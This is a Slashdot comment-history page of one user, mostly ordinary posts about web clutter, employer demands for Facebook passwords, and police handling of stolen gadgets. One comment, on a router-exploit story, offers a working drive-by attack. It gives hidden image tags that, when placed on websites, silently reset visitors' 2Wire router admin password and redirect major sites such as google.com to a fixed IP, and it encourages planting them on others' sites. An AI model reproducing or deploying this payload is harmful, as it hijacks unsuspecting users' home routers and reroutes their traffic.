Forgot your password?
typodupeerror

Comment: Re:I know what you're talking about (Score 2) 301

by BlueUnderwear (#39684001) Attached to: Why Your IT Spending Is About To Hit the Wall

But it's not just slashdot. ALL websites are bum rushing the add more crap idea.

Correct. But as a geek site, slashdot should know better and lead by example.

And yes, other companies do look towards (perceived) geek sites such as slashdot, gnu.org and redhat.com in order to justify their own inadequacies. A while back, our company was putting a new website online, which had huge horse blinkers. When I pointed this out to the webmasters, their response was yeah, but just look your geek friends at gnu.org (which indeed had small blinkers at the time) and redhat.com (which is just fugly).

The situation has become so bad that even the pirate party has sites where half the links won't work, where the only way to make a donation is Paypal (even though most potential donators are local, and could use an IBAN bank account number).

So, slashdot, digg, heise.de, freshmeat, gnu.org, redhat: cut down on the crap, it's not only your own sites that you are littering, but the internet as a whole! Or, if you're actually enjoying turning the Internet into a landfill, then please stop the hypocrisy of posting articles complaining about it.

Comment: Re:The battle now begins. (Score 1) 407

If the school were to log in to the victim's Facebook account using a password that was extracted under duress, that should rise to any court's definition of "unauthorized access to a computer system," or whatever the relevant laws say. The user simply doesn't have the authority to grant "authorized access" -- only Facebook can do that.

Even if the user would have authority to grant access to third parties, trying to extract that access under duress would still be a crime. The real question is whether the threat of loss of employment counts as duress, or whether duress has to be a physical threat against life or health, such as a gun pointed to user's head.

Comment: Re:The battle now begins. (Score 2) 407

they have no contract with the company, so they cannot forbid them to do so. But they can forbid their clients to give away login credentials.

But the company interferes with a contract that Facebook has with its end user. And tortuous interference is an actionable claim:

Tortious interference with contract rights can occur where the tortfeasor (employer) convinces a party (employee=facebook user) to breach the contract against the plaintiff (facebook)

Comment: Re:Facebook vs. mobile (Score 1) 332

by BlueUnderwear (#36623408) Attached to: Facebook More Hated Than Banks, Utilities

Some other young people I know think of Facebook as a photo-sharing site. It's easy to upload photos from your phone to Facebook, and Facebook has good tools for organizing pictures.

... until Facebook notices that you used a Linux app to upload your photos, bans the app, and yanks all your photos.
The mistake has been corrected since then, but it's still a chilling experience.

Comment: Yeah, and now they even blame Mozilla's POSTDATA (Score 1) 332

by BlueUnderwear (#36623356) Attached to: Facebook More Hated Than Banks, Utilities
Yeah, and now they even blame Mozilla's POSTDATA bug on it:
Facebook doesn't want you to use the back button
... whereas in the old days, it was banks who were the scapegoat for this obnoxious behavior:
Banks are holding up Mozilla to make it break the back button on SSL pages that are the result of a form submission

Comment: Re:How do you get offenders to stop? (Score 1) 321

by BlueUnderwear (#33679664) Attached to: Is the Web Heading Toward Redirect Hell?

You instantly kill any reason for the redirect to be there (their counts will no longer be accurate).

Although URL shortening services are often abused to do invasive statistics, that's not the only reason why they exist...

You know, some people still use them to shorten URLs (like how else would you fit a long google maps URL into a short twitter message?)

Comment: Re:how would you prove (Score 1) 250

by BlueUnderwear (#29396993) Attached to: Tracking Stolen Gadgets — Manufacturers' New Dilemma

I'm telling you that walking in any busy police department in any city bigger than 100,000 people and asking for signatures on paper so that you can force Amazon to do something is a fools errand.

Not true. My father successfully got a police report in Lisbon (564657 inhabitants) for a stolen wallet, which contained far less than $300. And there was a huge queue, so it's not as if the police were underworked either.

Comment: Re:Street justice? (Score 1) 250

by BlueUnderwear (#29396979) Attached to: Tracking Stolen Gadgets — Manufacturers' New Dilemma

Third: At what price level is Police involvement warranted? Its not exactly Grand Theft Kindle you know. Cops have a few more important things to do.

But they should a least do a report, which you can then use for your travel insurance, or (in this case) for Amazon. And here in Europe, Police usually do take the time to do a report, even for trivial thefts or losses (even if no investigation follows... but in this case, all you need is the report number).

Fifth: Cellphone companies in Europe do put stolen phones on a list. They can't be activated.

Not true, at least not in Luxembourg. A friend of mine got his cellphone stolen, he reported it to the police, but they claimed that although technically possible to block and locate it (by its IMEI number), it was policy that this was not done for a mere theft... (you'd have to wonder in what circumstances they would actually use the feature).

Comment: Re:Seems Sensible (Score 1) 250

by BlueUnderwear (#29396961) Attached to: Tracking Stolen Gadgets — Manufacturers' New Dilemma

You've apparently never tried to report a stolen wallet or backpack, or even modest laptop. You fill out forms, answer questions,a nd they do _nothing_. It's just not important enough.

But at least you get the report form, needed to claim damages from your insurance company.

And if the stolen item does happen to fall into their lap, you do get it back. Case in point: my father got his wallet stolen in Lissabon, reported it to the police, and a couple of months later, he got it back.

What happens usually with wallets is that the thieves are "only" interested in the cash, and throw away the wallet (along with papers "useless" to them) as soon as possible (because it's dangerous to them to have id papers on them, which are not theirs). Eventually, somebody finds the wallet (because the thiefs don't bother with properly putting it into the trash, but rather throw it into the nearest bush or whatever), and brings it to the police... which then can send it back to you, if they've got a report on file.

Comment: If you have a website, paste the following code (Score 2, Interesting) 134

by BlueUnderwear (#23006034) Attached to: AT&T, 2Wire Ignoring Active Security Exploit [Updated]
Thanks so much for that URL.

If you want to join into the phun, put the following onto your website (or onto somebody else's website, if he happens to still use IIS):

<img src="http://192.168.1.254/xslt?PAGE=H04_POST&amp;PASSWORD=admin&amp;PASSWORD_CONF=admin" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=google.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.google.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=cnn.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.cnn.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=slashdot.org&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.slashdot.org&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>

Six Laptops That Don't Burn 140

Posted by kdawson
from the things-that-don't-go-boom dept.
digihome writes, "An exploding laptop can really ruin your weekend, so here's a review of six laptops that are unlikely to blow up." From the article: "We evaluated everything from battery and air vent temperatures, AC power draw and battery life to performance and price... What we found is that there's a real difference among those notebooks that know how to take the heat without sacrificing performance."

The reason that every major university maintains a department of mathematics is that it's cheaper than institutionalizing all those people.

Working...